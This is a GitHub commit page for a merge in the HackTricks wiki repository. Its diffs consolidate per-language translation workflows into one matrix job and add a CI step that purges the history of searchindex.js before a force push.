Merge branch 'master' into update_Hunting_Vulnerabilities_in_Keras_Model_Deserializa_20250820_124658

This commit is contained in:
SirBroccoli 2025-08-21 14:48:04 +02:00 committed by GitHub
commit 3227cd6089
38 changed files with 1946 additions and 1813 deletions

View File

@ -26,19 +26,6 @@ jobs:
environment: prod
steps:
- name: Free Disk Space (Ubuntu)
uses: jlumbroso/free-disk-space@main
with:
# this might remove tools that are actually needed,
# when set to "true" but frees about 6 GB
tool-cache: true
- name: Clean space
run: |
echo "Cleaning space"
sudo rm -rf "/usr/local/share/boost"
sudo rm -rf "$AGENT_TOOLSDIRECTORY"
- name: Checkout code
uses: actions/checkout@v4
with:
@ -48,21 +35,61 @@ jobs:
- name: Build mdBook
run: MDBOOK_BOOK__LANGUAGE=en mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex in repo
- name: Update searchindex in repo (purge history, keep current on HEAD)
shell: bash
run: |
set -euo pipefail
ls -la
ls -la book
git config --global --add safe.directory /__w/hacktricks/hacktricks
git pull
git config --global user.email "build@example.com"
git config --global user.name "Build master"
git config pull.rebase false
# Ensure we're on the target branch and up to date
git pull --ff-only
# Choose the file to keep at HEAD:
# 1) Prefer freshly built version from book/
# 2) Fallback to the file currently at HEAD (if it exists)
HAS_FILE=0
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
cp "book/searchindex.js" /tmp/sidx.js
HAS_FILE=1
elif git cat-file -e "HEAD:searchindex.js" 2>/dev/null; then
git show "HEAD:searchindex.js" > /tmp/sidx.js
HAS_FILE=1
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Skip if there's nothing to purge AND nothing to keep
if [ "$HAS_FILE" = "1" ] || git rev-list -n 1 HEAD -- "searchindex.js" >/dev/null 2>&1; then
# Fail early if working tree is dirty (avoid confusing rewrites)
git diff --quiet || { echo "Working tree has uncommitted changes; aborting purge." >&2; exit 1; }
# Install git-filter-repo and ensure it's on PATH
python -m pip install --quiet --user git-filter-repo
export PATH="$HOME/.local/bin:$PATH"
# Rewrite ONLY the current branch, dropping all historical blobs of searchindex.js
git filter-repo --force --path "searchindex.js" --invert-paths --refs "$(git symbolic-ref -q HEAD)"
# Re-add the current version on top of rewritten history (keep it in HEAD)
if [ "$HAS_FILE" = "1" ]; then
mv /tmp/sidx.js "searchindex.js"
git add "searchindex.js"
git commit -m "Update searchindex (purged history; keep current)"
else
echo "No current searchindex.js to re-add after purge."
fi
# Safer force push (only updates if remote hasn't advanced)
git push --force-with-lease
else
echo "Nothing to purge; skipping."
fi
# Login in AWs
- name: Configure AWS credentials using OIDC

View File

@ -1,100 +0,0 @@
name: Translator to AF (Afrikaans)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: af
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Afrikaans
BRANCH: af
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

193
.github/workflows/translate_all.yml vendored Normal file
View File

@ -0,0 +1,193 @@
name: Translate All
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
permissions:
packages: write
id-token: write
contents: write
jobs:
translate:
name: Translate → ${{ matrix.name }} (${{ matrix.branch }})
runs-on: ubuntu-latest
# Run N languages in parallel (tune max-parallel if needed)
strategy:
fail-fast: false
# max-parallel: 3 #Nothing to run all in parallel
matrix:
include:
- { name: "Afrikaans", language: "Afrikaans", branch: "af" }
- { name: "German", language: "German", branch: "de" }
- { name: "Greek", language: "Greek", branch: "el" }
- { name: "Spanish", language: "Spanish", branch: "es" }
- { name: "French", language: "French", branch: "fr" }
- { name: "Hindi", language: "Hindi", branch: "hi" }
- { name: "Italian", language: "Italian", branch: "it" }
- { name: "Japanese", language: "Japanese", branch: "ja" }
- { name: "Korean", language: "Korean", branch: "ko" }
- { name: "Polish", language: "Polish", branch: "pl" }
- { name: "Portuguese", language: "Portuguese", branch: "pt" }
- { name: "Serbian", language: "Serbian", branch: "sr" }
- { name: "Swahili", language: "Swahili", branch: "sw" }
- { name: "Turkish", language: "Turkish", branch: "tr" }
- { name: "Ukrainian", language: "Ukrainian", branch: "uk" }
- { name: "Chinese", language: "Chinese", branch: "zh" }
# Ensure only one job per branch runs at a time (even across workflow runs)
concurrency:
group: translate-cloud-${{ matrix.branch }}
cancel-in-progress: false
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
env:
LANGUAGE: ${{ matrix.language }}
BRANCH: ${{ matrix.branch }}
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Update and download scripts
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget -O get_and_save_refs.py https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/master/scripts/get_and_save_refs.py
wget -O compare_and_fix_refs.py https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/master/scripts/compare_and_fix_refs.py
wget -O translator.py https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run get_and_save_refs.py
run: |
python scripts/get_and_save_refs.py
- name: Download language branch & update refs
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
python scripts/compare_and_fix_refs.py --files-unmatched-paths /tmp/file_paths.txt
git add .
git commit -m "Fix unmatched refs" || echo "No changes to commit"
git push || echo "No changes to push"
- name: Run translation script on changed files
run: |
git checkout master
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n ",$file" >> /tmp/file_paths.txt
fi
done
echo "Files to translate:"
cat /tmp/file_paths.txt
echo ""
echo ""
touch /tmp/file_paths.txt
if [ -s /tmp/file_paths.txt ]; then
python scripts/translator.py \
--language "$LANGUAGE" \
--branch "$BRANCH" \
--api-key "$OPENAI_API_KEY" \
-f "$(cat /tmp/file_paths.txt)" \
-t 3
else
echo "No markdown files changed, skipping translation."
fi
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo (purge history, keep current on HEAD)
shell: bash
run: |
set -euo pipefail
# Be explicit about workspace trust (avoids "dubious ownership")
git config --global --add safe.directory "$GITHUB_WORKSPACE"
git checkout "$BRANCH"
git fetch origin "$BRANCH" --quiet
git pull --ff-only
# Choose the file to keep at HEAD:
# 1) Prefer freshly built version from book/
# 2) Fallback to the file currently at HEAD (if it exists)
HAS_FILE=0
if [ -f "book/searchindex.js" ]; then
cp "book/searchindex.js" /tmp/sidx.js
HAS_FILE=1
elif git cat-file -e "HEAD:searchindex.js" 2>/dev/null; then
git show "HEAD:searchindex.js" > /tmp/sidx.js
HAS_FILE=1
fi
# Skip if there's nothing to purge AND nothing to keep
if [ "$HAS_FILE" = "1" ] || git rev-list -n 1 "$BRANCH" -- "searchindex.js" >/dev/null 2>&1; then
# **Fail early if working tree is dirty** (prevents confusing filter results)
git diff --quiet || { echo "Working tree has uncommitted changes; aborting purge." >&2; exit 1; }
# Make sure git-filter-repo is callable via `git filter-repo`
python -m pip install --quiet --user git-filter-repo
export PATH="$HOME/.local/bin:$PATH"
# Rewrite ONLY this branch, dropping all historical blobs of searchindex.js
git filter-repo --force --path "searchindex.js" --invert-paths --refs "refs/heads/$BRANCH"
# Re-add the current version on top of rewritten history (keep it in HEAD)
if [ "$HAS_FILE" = "1" ]; then
mv /tmp/sidx.js "searchindex.js"
git add "searchindex.js"
git commit -m "Update searchindex (purged history; keep current)"
else
echo "No current searchindex.js to re-add after purge."
fi
# **Safer force push** (prevents clobbering unexpected remote updates)
git push --force-with-lease origin "$BRANCH"
else
echo "Nothing to purge; skipping."
fi
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to DE (German)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: de
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: German
BRANCH: de
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to EL (Greek)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: el
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Greek
BRANCH: el
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to ES (Spachins)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: es
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Spanish
BRANCH: es
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to FR (French)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: fr
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: French
BRANCH: fr
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to HI (Hindi)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: hi
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Hindi
BRANCH: hi
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to IT (Italian)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: it
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Italian
BRANCH: it
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to JA (Japanese)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: ja
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Japanese
BRANCH: ja
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to KO (Korean)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: ko
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Korean
BRANCH: ko
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
